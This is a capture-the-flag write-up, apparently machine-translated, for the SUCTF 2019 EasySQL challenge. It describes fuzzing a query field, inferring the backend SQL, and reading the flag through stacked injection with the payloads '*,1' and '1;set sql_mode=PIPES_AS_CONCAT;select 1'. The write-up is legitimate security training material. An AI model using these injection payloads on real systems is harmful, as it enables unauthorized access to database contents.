Title address: https://buuoj.cn/challenges#[SUCTF%202019]EasySQL
SQL query, observe the echo, here should be var_dump()output
When testing the query, I found that some characters can be used and some characters are filtered, so the query point is fuzzed to see which characters are filtered
The length of the returned packet is 523. All other characters are filtered.
PS: The thread that uses Burp for fuzzing here should not be set too high. It is easy to report 429. If there are not many characters, you can run slowly.
;Can be used, try堆叠注入
First of all, the queryparameters here will only be echoed no matter what we input numbers Array([0]= > 1), the input letters will not be displayed, but it does not show that it is filtered, so queryif the value is not a number, the data cannot be correctly queried and the data echoed, then the query statement should be Like this
$sql = "select ".$post['query']."||flag from Flag";
It’s easy to do it if you know the query statement, first look at an unexpected solution
Unexpected solution
||In the SQL statement 或, when querying the field content in the table, the comma is ,used to query multiple field names
payload
*,1
Expected solution
Set the OR operator ||as a connector by modifying the SQL configuration
set sql_mode=PIPES_AS_CONCAT;
payload
1;set sql_mode=PIPES_AS_CONCAT;select 1
The sentence resulting from this splicing should be
select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag;
